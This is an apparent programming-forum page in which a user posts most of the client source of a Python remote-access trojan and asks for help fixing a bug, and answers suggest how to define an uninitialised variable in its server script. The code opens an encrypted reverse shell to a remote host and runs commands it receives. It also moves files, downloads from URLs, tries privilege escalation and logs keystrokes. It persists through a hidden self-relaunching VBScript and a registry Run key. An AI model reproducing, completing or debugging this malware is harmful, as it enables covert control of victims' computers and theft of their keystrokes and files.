exedir = os.path.join(sys.path[0], sys.argv[0])
exeown = exedir.split('\\')[-1]
# get vbscript location
vbsdir = os.getcwd() + '\\' + 'vbscript.vbs'
# write VBS script
if redown == None: vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nWhile state = 1\nexist = ReportFileStatus(wshname)\nIf exist = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nElse\nWshShell.Run """' + exedir + '""",hidden\nwscript.sleep 50000\nEnd If\nvFound = False\nElse\nwscript.sleep 50000\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\n'
else:
if newdir == None:
newdir = exedir
newexe = exeown
else:
newexe = newdir.split('\\')[-1]
vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nurlname = "' + redown + '"\ndirname = "' + newdir + '"\nWhile state = 1\nexist1 = ReportFileStatus(wshname)\nexist2 = ReportFileStatus(dirname)\nIf exist1 = False And exist2 = False then\ndownload urlname, dirname\nEnd If\nIf exist1 = True Or exist2 = True then\nif exist1 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nexist2 = False\nend if\nif exist2 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(dirname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" OR objProcess.name = "' + newexe + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nEnd If\nIf vFound = False then\nIf exist1 = True then\nWshShell.Run """' + exedir + '""",hidden\nEnd If\nIf exist2 = True then\nWshShell.Run """' + dirname + '""",hidden\nEnd If\nwscript.sleep 50000\nEnd If\nvFound = False\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\nfunction download(sFileURL, sLocation)\nSet objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\nobjXMLHTTP.open "GET", sFileURL, false\nobjXMLHTTP.send()\ndo until objXMLHTTP.Status = 200 : wscript.sleep(1000) : loop\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject("ADODB.Stream")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject("Scripting.FileSystemObject")\nIf objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile sLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nEnd function\n'
# open file & write
vbs = open('vbscript.vbs', 'wb')
vbs.write(vbscript)
vbs.close()
# add registry to startup
persist = Exec('reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "' + vbsdir + '"')
persist += '\nPersistence complete.\n'
return persist
# execute command
def Exec(cmde):
# check if command exists
if cmde:
execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
cmdoutput = execproc.stdout.read() + execproc.stderr.read()
return cmdoutput
# otherwise, return
else:
return "Enter a command.\n"
# keylogging function
# version 1, by K.B. Carte
##########################
# enter log filename.
LOG_STATE = True
LOG_FILENAME = 'keylog.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=LOG_FILENAME,
level=logging.DEBUG,
format='%(message)s')
logging.log(10,chr(event.Ascii))
return True
# main loop
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# create a cipher object using the random secret
cipher = AES.new(secret,AES.MODE_CFB, iv)
# waiting to be activated...
data = Receive(s)
# activate.
if data == 'Activate':
active = True
Send(s, "\n"+os.getcwd()+">")
# interactive loop
while active:
# Receive data
data = Receive(s)
# think before you type smartass
if data == '':
time.sleep(0.02)
# check for quit
if data == "quit" or data == "terminate":
Send(s, "quitted")
break
# check for change directory
elif data.startswith("cd ") == True:
try:
os.chdir(data[3:])
stdoutput = ""
except:
stdoutput = "Error opening directory.\n"
# check for download
elif data.startswith("download") == True:
# Upload the file
stdoutput = Upload(s, data[9:])
elif data.startswith("downhttp") == True:
# Download from url
stdoutput = Downhttp(s, data[9:])
# check for upload
elif data.startswith("upload") == True:
# Download the file
stdoutput = Download(s, data[7:])
elif data.startswith("privs") == True:
# Attempt to elevate privs
stdoutput = Privs(s)
elif data.startswith("persist") == True:
# Attempt persistence
if len(data.split(' ')) == 1: stdoutput = Persist(s)
elif len(data.split(' ')) == 2: stdoutput = Persist(s, data.split(' ')[1])
elif len(data.split(' ')) == 3: stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2])
elif data.startswith("keylog") == True:
# Begin keylogging
if LOG_STATE == False:
try:
# set to True
LOG_STATE = True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
stdoutput = "Logging keystrokes to: "+LOG_FILENAME+"...\n"
except:
ctypes.windll.user32.PostQuitMessage(0)
# set to False
LOG_STATE = False
stdoutput = "Keystrokes have been logged to: "+LOG_FILENAME+".\n"
else:
# execute command.
stdoutput = Exec(data)
# send data
stdoutput = stdoutput+"\n"+os.getcwd()+">"
Send(s, stdoutput)
# loop ends here
if data == "terminate":
break
time.sleep(3)
except socket.error:
s.close()
time.sleep(10)
continue
I would appreciate any pointers.

In xmulti_aeserver.py just above:
# main loop
while True:
.....
write nextcmd = ''. So it will be:
nextcmd = ''
# main loop
while True:
.....
This will define the nextcmd.
Add to this IF statment:
elif data != '':
# get next command
sys.stdout.write(data)
nextcmd = raw_input()
elif data == '':
nextcmd = raw_input()
else:
nextcmd = raw_input()

You only define nextcmd in one branch of an if-else statement:
elif data != '':
# get next command
sys.stdout.write(data)
nextcmd = raw_input()
but then assume that it is defined on line 207. You are missing the case where data is the empty string, which prevents nextcmd from being defined when you try to access it.

It looks like you have
if data == 'quitted':
....
elif data != '':
....
nextcmd = raw_input()
But if data=='', nextcmd is not set to anything, which causes the error when you try and use it.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

download files from internet using urllib2 - python

Related

python - Downloading file from website using requests

read/write process memory when sudo has no permission to do so

Pythonscript to download whole book from springerlink instead of chapters (or alternative)

How to optimize the memory usage of my python crawler

Python Script Name Not Defined

Categories

Resources